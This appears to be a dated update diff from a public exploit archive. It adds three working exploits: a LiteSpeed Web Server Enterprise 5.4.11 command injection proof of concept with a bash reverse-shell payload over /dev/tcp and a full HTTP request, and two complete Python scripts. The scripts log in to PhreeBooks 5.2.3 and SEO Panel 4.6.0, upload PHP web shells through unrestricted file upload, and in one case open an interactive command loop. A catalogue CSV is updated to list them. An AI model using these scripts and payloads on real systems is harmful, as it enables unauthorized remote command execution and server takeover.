DB: 2021-02-06

3 changes to exploits/shellcodes

PhreeBooks ERP 5.2.3 - Remote Command Execution
PhreeBooks ERP 5.2.3 - Remote Command Execution (1)

SEO Panel 4.6.0 - Remote Code Execution
SEO Panel 4.6.0 - Remote Code Execution (1)
LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
PhreeBooks 5.2.3 ERP - Remote Code Execution (2)
SEO Panel 4.6.0 - Remote Code Execution (2)

exploits/php/webapps/49523.txt

@@ -0,0 +1,36 @@
+# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
+# Date: 05/20/2021
+# Exploit Author: cmOs - SunCSR
+# Vendor Homepage: https://www.litespeedtech.com/
+# Software Link: https://www.litespeedtech.com/products
+# Version: 5.4.11
+# Ubuntu/Kali Linux
+
+
+Step 1: Log in to the dashboard using the Administrator account.
+Step 2 : Access Server Configuration > Server > External App > Edit
+Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
+Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
+Step 5: Graceful Restart
+
+[POC]
+
+POST /config/confMgr.php HTTP/1.1
+Host: 192.168.1.6:7080
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
+Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
+;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+https://192.168.1.6:7080/config/confMgr.php?m=serv&p=ext&t=A_EXT_FCGI&r=file&a=E&tk=0.59220300%201612516386
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 505
+Origin: https://192.168.1.6:7080
+Connection: close
+Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f;
+lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D
+Upgrade-Insecure-Requests: 1
+
+name=file&address=127.0.0.1%3A5434&note=&maxConns=2000&env=&initTimeout=1&retryTimeout=1&persistConn=1&pcKeepAliveTimeout=20&respBuffer=0&autoStart=1&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27&backlog=&instances=&extUser=root&extGroup=root&umask=&runOnStartUp=3&extMaxIdleTime=&priority=&memSoftLimit=&memHardLimit=&procSoftLimit=&procHardLimit=&a=s&m=serv&p=ext&t=A_EXT_FCGI&r=file&tk=0.59220300+1612516386&file_create=

exploits/php/webapps/49524.py

@@ -0,0 +1,187 @@
+# Exploit Title: PhreeBooks 5.2.3 - Remote Code Execution
+# Date: 22 Jan 2021
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://www.phreesoft.com/
+# Software Link: https://sourceforge.net/projects/phreebooks/
+# Version: 5.2.3
+# Tested on: Windows Server 2016
+
+#!/usr/bin/env python3
+
+'''
+DESCRIPTION:
+    - PhreeBooks ERP 5.2.3 is vulnerable to remote code execution
+      due to authenticated unrestricted file upload in the "Image Manager"
+      section of the application.
+
+VULNERABLE VERSION:
+    - ver 5.2.3
+
+AUTHOR:
+    - Kr0ff
+
+Note: This is a rewrite of exploit: https://www.exploit-db.com/exploits/46645
+
+Web shell used as payload: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
+'''
+#https://asciiart.website/index.php?art=animals/
+
+try:
+    import requests
+    import argparse
+    import sys
+    import re
+    import random
+    from termcolor import colored
+    from time import sleep
+except ImportError as e:
+    print(colored("[ERROR]: ", "red"), f"{e}")
+
+def ascii_art():
+    example_usage = "python3 exploit.py -t http://10.10.10.120/phreebooks -u admin@phreebooks.com -p admin"
+    art = '''
+
+                 \     /
+             \    o ^ o    /
+               \ (     ) /
+    ____________(%%%%%%%)____________
+   (     /   /  )%%%%%%%(  \   \     )
+   (___/___/__/           \__\___\___)
+      (     /  /(%%%%%%%)\  \     )
+       (__/___/ (%%%%%%%) \___\__)
+               /(       )\\
+             /   (%%%%%)   \\
+                  (%%%)
+                    !
+
+ | _ \ |_  _ _ ___ ___| |__  ___  ___| |__ ___
+ |  _/ ' \| '_/ -_) -_) '_ \/ _ \/ _ \ / /(_-<
+ |_| |_||_|_| \___\___|_.__/\___/\___/_\_\/__/
+         ___ ___ ___   ___  ___ ___
+        | __| _ \ _ \ | _ \/ __| __|
+        | _||   /  _/ |   / (__| _|
+        |___|_|_\_|   |_|_\\___|___|    v5.2.3
+==============================================
+'''
+    print(art)
+    print(example_usage)
+    print("\r\n==============================================\r\n")
+
+def exploit(TARGET, USER, PASS):
+    '''
+    PHP Reverse Shell
+    '''
+    web_shell = """
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd']);
+    }
+?>
+</pre>
+</body>
+<script>document.getElementById("cmd").focus();</script>
+</html>
+"""
+
+    '''
+    Perform the login and grab cookies of user
+    '''
+    error_msg = "The information you entered cannot be validated, please retry."
+    url = f"{TARGET}/index.php?&p=bizuno/portal/login"
+    headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": f"{TARGET}/index.php?p=", "Content-Type": "multipart/form-data; boundary=---------------------------211698600840544395022617560470", "Connection": "close"}
+    login_data=f"-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserID\"\r\n\r\n{USER}\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserPW\"\r\n\r\n{PASS}\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name=\"UserLang\"\r\n\r\nen_US\r\n-----------------------------211698600840544395022617560470--\r\n"
+
+    print(colored("[*]","blue"), f"Logging in using account: \"{USER}\"")
+    r = requests.post(url, headers=headers, data=login_data, verify=False)
+
+    if error_msg in r.text:
+        print(colored("[-]","red"), f"Couldn't log in using account: \"{USER}\"...")
+        print("Something could be wrong, check everything and try again...")
+        sys.exit(1)
+        print(colored("[+]","green"), f"Logged in with account: \"{USER}\"")
+    else:
+        print(colored("[+]","green"), f"Logged in with account: \"{USER}\"")
+
+    try:
+        print(colored("[*]","blue"), f"Grabbing cookies...")
+        get_all_cookies = r.headers['Set-Cookie']
+        get_needed_cookies = re.split(r'\s', get_all_cookies)[6].replace(';','').replace('bizunoSession=','').strip()
+        user_cookie = re.split(r'\s', get_all_cookies)[13].replace(';','').replace('bizunoUser=','').strip()
+    except IndexError:
+        print(colored("[-]","red"), f"Couldn't grab cookies...")
+        print("Something could be wrong, check everything and try again...")
+        sys.exit(1)
+
+    '''
+    Continue with the exploitation part of the exploit
+    Uploading a file with random name and .php extension,
+    since "Image Manager" doesn't restrict file types
+    '''
+
+    f_name = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php"
+    print(colored("[*]","blue"), f"Trying to upload file \"{f_name}\"")
+
+    e_url = f"{TARGET}/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload"
+    e_cookies = {"bizunoLang": "en_US", "bizunoUser": f"{user_cookie}", "bizunoSession": f"{get_needed_cookies}"}
+    e_headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": f"{TARGET}/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------211698600840544395022617560470", "Connection": "close"}
+    e_data= f'-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name="imgSearch"\r\n\r\n\r\n-----------------------------211698600840544395022617560470\r\nContent-Disposition: form-data; name="imgFile"; filename="{f_name}"\r\nContent-Type: binary/octet-stream\r\n\r\n{web_shell}\n\r\n-----------------------------211698600840544395022617560470--\r\n'
+
+    u_req = requests.post(e_url, headers=e_headers, cookies=e_cookies, data=e_data, verify=False)
+    if u_req.status_code == 200:
+        print(colored("[+]","green"), f"Uploaded file: \"{f_name}\"")
+    else:
+        print(colored("[-]","red"), f"Couldn't upload file: \"{f_name}\"")
+        print("Something could be wrong, check everything and try again...")
+        sys.exit(1)
+
+    '''
+    Perform the execution of the PHP reverse shell
+    by accessing the path to it
+    '''
+    sreq = requests.get(f"{TARGET}/myFiles/images/{f_name}")
+    if sreq.status_code == 200:
+        print(colored("[+]", "green"), f"Webshell is uploaded to: {TARGET}/myFiles/images/{f_name}")
+    elif sreq.status_code == 404:
+        print(colored("[-]", "red"), f"Webshell was not uploaded !\r\nCheck your target...")
+        print("Check if the upload file path is correct in the exploit and in the web application...")
+        sys.exit(0)
+    else:
+        print(colored("[!]", "yellow"), f"Something could be wrong, check everything and try again...\r\n")
+        sys.exit(1)
+
+'''
+Initilize parser for arguments
+'''
+def parse_argz():
+    parser = argparse.ArgumentParser(description='PhreeBooks 5.2.3 Remote Code Execution via Authenticated File Upload ')
+    parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/phreebooks", type=str, required=True)
+    parser.add_argument("-u", "--user", help="Email to login as", type=str, required=True)
+    parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str, required=True)
+    #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
+    args = parser.parse_args(args=None)
+
+    if len(sys.argv) == 1:
+        parser.print_help()
+        sys.exit(1)
+
+    TARGET = str(args.target)
+    USER = str(args.user)
+    PASS = str(args.passwd)
+
+    exploit(TARGET, USER, PASS)
+
+if __name__ == "__main__":
+    try:
+        ascii_art()
+        parse_argz()
+    except Exception as e:
+       print(colored("[ERROR]","red"), f"-> {e}")
+       sys.exit(1)

exploits/php/webapps/49525.py

@@ -0,0 +1,134 @@
+# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2)
+# Date: 22 Jan 2021
+# Exploit Author: Kr0ff
+# Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/
+# Software Link: https://www.seopanel.org/spdownload/4.6.0
+# Version: 4.6.0
+# Tested on: Ubuntu 20.04
+
+#!/usr/bin/env python3
+
+'''
+DESCRIPTION:
+    - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload
+
+FIXED:
+    - ver 4.7.0
+
+AUTHOR:
+    - Kr0ff
+'''
+#https://asciiart.website/index.php?art=animals/bats
+
+try:
+    import requests
+    import argparse
+    import sys
+    from termcolor import colored
+    from time import sleep
+except ImportError as e:
+    print(colored("[ERROR]: ", "red"), f"{e}")
+
+def arty():
+    artz = """
+                    HAPPY HALLOWEEN !
+    ....._
+     `.   ``-.                               .-----.._
+       `,     `-.                          .:      /`
+         :       `"..                 ..-``       :
+         /   ...--:::`n            n.`::...       :
+         `:``      .` ::          /  `.     ``---..:.
+           `\    .`  ._:   .-:   ::    `.     .-``
+             :  :    :_\\_/: :  .::      `.  /
+             : /      \-../:/_.`-`         \ :
+             :: _.._  q` p ` /`             \|
+             :-`    ``(_. ..-----hh``````/-._:
+                         `:      ``     /     `
+                         E:            /
+                          :          _/
+                          :    _..-``
+                          l--``
+----------------------------------------------------------
+                             _
+ ___ ___ ___ ___  __ ___ ___| |___ ___ ___
+|_ -| -_| . | . ||. |   | -_| |  _|  _| -_|
+|___|___|___|  _|___|_|_|___|_|_| |___|___|
+            |_|                       4.6.0
+
+@Kr0ff
+----------------------------------------------------------
+"""
+    print(artz)
+
+#Initialize requests to create a session
+r = requests.session()
+
+#Create a login for the user
+def login(TARGET, USER, PASS):
+    data = {"sec":"login", "red_referer": f"{TARGET}", "userName": f"{USER}", "password": f"{PASS}","login":""}
+    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    req = r.post(f"{TARGET}/login.php", headers=headers, data=data, verify=False)
+    if req.status_code == 200:
+        print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {req.status_code}\r\n")
+    else:
+        print(colored("[FAILURE]", "red"), f"Status code for login.php -> {req.status_code}\r\n")
+        print("Please check if you are providing the right path to 'seopanel' or if server is live...")
+    get_ch = req.headers.get("Set-Cookie")
+    return get_ch
+
+#Upload the webshell to target server
+def exploit(TARGET, USER, PASS):
+    login(TARGET, USER, PASS)
+    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": TARGET + "/admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    payload = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"bc1ab68651691302e1434959b70cba26.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['veiocx']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n"
+    req0 = r.post(f"{TARGET}/websites.php", headers=headers, data=payload, verify=False)
+    if req0.status_code == 200:
+        print(colored("[SUCCESS]", "green"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
+    else:
+        print(colored("[FAILURE]", "red"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n")
+        print("Please check if you are providing the right path or if server is live...")
+
+    while(1):
+        try:
+            p = input("$> ")
+            shell_url = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx={p}"
+            control = r.get(shell_url, headers=headers, verify=False)
+            if control.status_code == 200:
+                print(colored("[SUCCESS]","green"), "Shell uploaded successfully !\r\n\r\n")
+                print(control.text)
+            else:
+                print(colored("[ERROR]","red"), "Shell not uploaded... :(")
+                print("Status code ->", colored(control.status_code, "red"))
+                sys.exit(0)
+        except KeyboardInterrupt: #Do self-cleanup on ctrl+c and wait a sec
+            cleanup = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx=rm bc1ab68651691302e1434959b70cba26.php"
+            requests.get(cleanup, headers=headers, verify=False)
+            sleep(1)
+            print(colored("\r\n[ERROR]", "red"), "Exitting ! Self-cleanup done !")
+            break
+
+#Initilize parser for arguments
+def parse_argz():
+    parser = argparse.ArgumentParser(description='SEO Panel 4.6.0 authenticated RCE via file upload')
+    parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/seopanel/", type=str)
+    parser.add_argument("-u", "--user", help="Username to login as", type=str)
+    parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str)
+    #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
+    args = parser.parse_args(args=None)
+
+    if not args.target or not args.user or not args.passwd:
+        parser.error(colored("[WARNING]","yellow"), "Not all arguments provided")
+        sys.exit(1)
+    else:
+        TARGET = str(args.target)
+        USER = str(args.user)
+        PASS = str(args.passwd)
+        exploit(TARGET, USER, PASS)
+
+if __name__ == "__main__":
+    try:
+        arty()
+        parse_argz()
+    except Exception as e:
+        print(colored("[ERROR]","red"), f"-> {e}")
+        sys.exit(1)

files_exploits.csv

@@ -18158,7 +18158,7 @@ id,file,description,date,author,type,platform,port
 46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80
 46628,exploits/multiple/remote/46628.rb,"Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)",2019-03-28,Metasploit,remote,multiple,
 46641,exploits/php/remote/46641.rb,"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)",2019-04-03,AkkuS,remote,php,80
-46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80
+46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80
 46654,exploits/multiple/remote/46654.html,"Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion",2019-04-03,"Google Security Research",remote,multiple,
 46655,exploits/hardware/remote/46655.rb,"Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)",2019-04-03,Metasploit,remote,hardware,
 46662,exploits/php/remote/46662.rb,"WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80
@@ -40809,7 +40809,7 @@ id,file,description,date,author,type,platform,port
 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
 48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
-48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
+48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution (1)",2020-10-08,"Kiko Andreu",webapps,php,
 48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
 48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
 48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
@@ -43714,3 +43714,6 @@ id,file,description,date,author,type,platform,port
 49513,exploits/php/webapps/49513.txt,"Student Record System 4.0 - 'cid' SQL Injection",2021-02-02,"Jannick Tiger",webapps,php,
 49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,
 49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,
+49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,
+49524,exploits/php/webapps/49524.py,"PhreeBooks 5.2.3 ERP - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,
+49525,exploits/php/webapps/49525.py,"SEO Panel 4.6.0 - Remote Code Execution (2)",2021-02-05,Kr0ff,webapps,php,